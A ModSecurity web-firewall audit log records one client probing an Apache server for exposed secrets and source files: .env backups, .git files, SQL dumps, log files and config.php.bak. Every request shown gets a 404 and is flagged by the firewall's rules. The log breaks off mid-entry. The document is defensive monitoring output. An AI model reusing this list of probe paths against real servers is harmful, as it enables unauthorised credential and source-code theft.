[unique_id "aFCsBJVkCcfT-Z8NQYzFAAAAAAc"] Stopwatch: 1750117380682130 3721 (- - -) Stopwatch2: 1750117380682130 3721; combined=2167, p1=475, p2=1565, p3=25, p4=31, p5=71, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d6c9af66-Z-- --3bb0aa41-A-- [17/Jun/2025:05:13:00.796580 +0530] aFCsBOTJOk1gXj_qIh4X7QAAAAQ 185.177.72.204 35876 127.0.0.1 7080 --3bb0aa41-B-- GET /core/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3bb0aa41-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bb0aa41-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env.bak"] [unique_id "aFCsBOTJOk1gXj_qIh4X7QAAAAQ"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/.env.bak"] [unique_id "aFCsBOTJOk1gXj_qIh4X7QAAAAQ"] Stopwatch: 1750117380793240 3398 (- - -) Stopwatch2: 1750117380793240 3398; combined=2067, p1=512, p2=1420, p3=20, p4=34, p5=81, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3bb0aa41-Z-- --1f56890a-A-- [17/Jun/2025:05:13:00.906953 +0530] aFCsBArsPejRtmHkrKLgjQAAAAE 185.177.72.204 35886 127.0.0.1 7080 --1f56890a-B-- GET /core/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1f56890a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f56890a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env.local"] [unique_id "aFCsBArsPejRtmHkrKLgjQAAAAE"] Stopwatch: 1750117380903773 3233 (- - -) Stopwatch2: 1750117380903773 3233; combined=1915, p1=369, p2=1446, p3=21, p4=27, p5=51, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1f56890a-Z-- --132f802b-A-- [17/Jun/2025:05:13:01.018012 +0530] aFCsBWMOUduHrxpwbslYVwAAAAM 185.177.72.204 35894 127.0.0.1 7080 --132f802b-B-- GET /core/.env.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --132f802b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --132f802b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env.old"] [unique_id "aFCsBWMOUduHrxpwbslYVwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/.env.old"] [unique_id "aFCsBWMOUduHrxpwbslYVwAAAAM"] Stopwatch: 1750117381014341 3731 (- - -) Stopwatch2: 1750117381014341 3731; combined=2285, p1=455, p2=1681, p3=24, p4=31, p5=94, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --132f802b-Z-- --3b87f068-A-- [17/Jun/2025:05:13:01.205410 +0530] aFCsBdyZ4SMykfn97vy3gQAAAAs 185.177.72.204 35896 127.0.0.1 7080 --3b87f068-B-- GET /core/.env.save HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3b87f068-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b87f068-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env.save"] [unique_id "aFCsBdyZ4SMykfn97vy3gQAAAAs"] Stopwatch: 1750117381125126 80336 (- - -) Stopwatch2: 1750117381125126 80336; combined=156394, p1=357, p2=1424, p3=16, p4=22, p5=77313, sr=86, sw=0, l=0, gc=77262 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3b87f068-Z-- --79e8da67-A-- [17/Jun/2025:05:13:01.239006 +0530] aFCsBZVkCcfT-Z8NQYzFAQAAAAc 185.177.72.204 35906 127.0.0.1 7080 --79e8da67-B-- GET /core/.env~ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --79e8da67-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --79e8da67-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.env~"] [unique_id "aFCsBZVkCcfT-Z8NQYzFAQAAAAc"] Stopwatch: 1750117381235345 3730 (- - -) Stopwatch2: 1750117381235345 3730; combined=2305, p1=575, p2=1608, p3=23, p4=30, p5=69, sr=226, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --79e8da67-Z-- --886b2452-A-- [17/Jun/2025:05:13:01.349524 +0530] aFCsBQrsPejRtmHkrKLgjgAAAAE 185.177.72.204 35908 127.0.0.1 7080 --886b2452-B-- GET /core/.git/ HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --886b2452-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --886b2452-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.git/"] [unique_id "aFCsBQrsPejRtmHkrKLgjgAAAAE"] Stopwatch: 1750117381346043 3544 (- - -) Stopwatch2: 1750117381346043 3544; combined=2137, p1=460, p2=1522, p3=31, p4=59, p5=65, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --886b2452-Z-- --6c284101-A-- [17/Jun/2025:05:13:01.460041 +0530] aFCsBWMOUduHrxpwbslYWAAAAAM 185.177.72.204 35914 127.0.0.1 7080 --6c284101-B-- GET /core/.git/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6c284101-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c284101-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.git/HEAD"] [unique_id "aFCsBWMOUduHrxpwbslYWAAAAAM"] Stopwatch: 1750117381456835 3251 (- - -) Stopwatch2: 1750117381456835 3251; combined=1961, p1=385, p2=1478, p3=23, p4=23, p5=51, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6c284101-Z-- --f70cb743-A-- [17/Jun/2025:05:13:01.570897 +0530] aFCsBYoVQnPDyHnl9oPTtQAAAAY 185.177.72.204 35920 127.0.0.1 7080 --f70cb743-B-- GET /core/.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f70cb743-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f70cb743-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.git/config"] [unique_id "aFCsBYoVQnPDyHnl9oPTtQAAAAY"] Stopwatch: 1750117381567364 3579 (- - -) Stopwatch2: 1750117381567364 3579; combined=2233, p1=405, p2=1698, p3=32, p4=40, p5=58, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f70cb743-Z-- --c4be5905-A-- [17/Jun/2025:05:13:01.681591 +0530] aFCsBZWbMc1Q3J_M-mhIrQAAAAo 185.177.72.204 35930 127.0.0.1 7080 --c4be5905-B-- GET /core/.git/logs/HEAD HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c4be5905-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4be5905-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.git/logs/HEAD"] [unique_id "aFCsBZWbMc1Q3J_M-mhIrQAAAAo"] Stopwatch: 1750117381678268 3373 (- - -) Stopwatch2: 1750117381678268 3373; combined=2080, p1=402, p2=1564, p3=31, p4=23, p5=60, sr=107, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c4be5905-Z-- --1893171b-A-- [17/Jun/2025:05:13:01.792015 +0530] aFCsBVJfblPUQiSn5r2RogAAAAA 185.177.72.204 35940 127.0.0.1 7080 --1893171b-B-- GET /core/.gitignore HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1893171b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --1893171b-H-- Message: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/core/.gitignore"] [unique_id "aFCsBVJfblPUQiSn5r2RogAAAAA"] Stopwatch: 1750117381788733 3345 (- - -) Stopwatch2: 1750117381788733 3345; combined=2083, p1=421, p2=1534, p3=21, p4=27, p5=79, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1893171b-Z-- --f38db13e-A-- [17/Jun/2025:05:13:01.903038 +0530] aFCsBZVkCcfT-Z8NQYzFAgAAAAc 185.177.72.204 35942 127.0.0.1 7080 --f38db13e-B-- GET /core/access.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f38db13e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f38db13e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/access.log"] [unique_id "aFCsBZVkCcfT-Z8NQYzFAgAAAAc"] Stopwatch: 1750117381899547 3536 (- - -) Stopwatch2: 1750117381899547 3536; combined=2263, p1=329, p2=1830, p3=22, p4=27, p5=54, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f38db13e-Z-- --eb525875-A-- [17/Jun/2025:05:13:02.124181 +0530] aFCsBgGFf516NUzzD0B3WwAAAAg 185.177.72.204 35960 127.0.0.1 7080 --eb525875-B-- GET /core/app.js.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --eb525875-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb525875-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".js.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/app.js.bak"] [unique_id "aFCsBgGFf516NUzzD0B3WwAAAAg"] Stopwatch: 1750117382120993 3233 (- - -) Stopwatch2: 1750117382120993 3233; combined=2023, p1=350, p2=1562, p3=20, p4=27, p5=64, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eb525875-Z-- --59ee0849-A-- [17/Jun/2025:05:13:02.235180 +0530] aFCsBmMOUduHrxpwbslYWQAAAAM 185.177.72.204 35966 127.0.0.1 7080 --59ee0849-B-- GET /core/backup.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --59ee0849-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --59ee0849-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/backup.sql"] [unique_id "aFCsBmMOUduHrxpwbslYWQAAAAM"] Stopwatch: 1750117382231431 3806 (- - -) Stopwatch2: 1750117382231431 3806; combined=2323, p1=425, p2=1776, p3=23, p4=30, p5=69, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --59ee0849-Z-- --4727291c-A-- [17/Jun/2025:05:13:02.948721 +0530] aFCsBpWbMc1Q3J_M-mhIrwAAAAo 185.177.72.204 36024 127.0.0.1 7080 --4727291c-B-- GET /core/config.php.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4727291c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4727291c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/config.php.bak"] [unique_id "aFCsBpWbMc1Q3J_M-mhIrwAAAAo"] Stopwatch: 1750117382945235 3531 (- - -) Stopwatch2: 1750117382945235 3531; combined=2182, p1=366, p2=1712, p3=20, p4=26, p5=58, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4727291c-Z-- --87f85e45-A-- [17/Jun/2025:05:13:03.170174 +0530] aFCsB-TJOk1gXj_qIh4X7wAAAAQ 185.177.72.204 36050 127.0.0.1 7080 --87f85e45-B-- GET /core/db.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87f85e45-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --87f85e45-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/db.sql"] [unique_id "aFCsB-TJOk1gXj_qIh4X7wAAAAQ"] Stopwatch: 1750117383166245 3984 (- - -) Stopwatch2: 1750117383166245 3984; combined=2501, p1=430, p2=1936, p3=34, p4=32, p5=68, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87f85e45-Z-- --0cabdf64-A-- [17/Jun/2025:05:13:03.391118 +0530] aFCsBwrsPejRtmHkrKLgkQAAAAE 185.177.72.204 36060 127.0.0.1 7080 --0cabdf64-B-- GET /core/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0cabdf64-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cabdf64-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/core/debug.log"] [unique_id "aFCsBwrsPejRtmHkrKLgkQAAAAE"] Stopwatch: 1750117383387748 3415 (- - -) Stopwatch2: 1750117383387748 3415; combined=2078, p1=411, p2=1565, p3=20, p4=26, p5=56, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0cabdf64-Z-- --7269ec62-A-- [17/Jun/2025:05:13:03.612636 +0530] aFCsB1JfblPUQiSn5r2RpQAAAAA 185.177.72.204 36072 127.0.0.1 7080 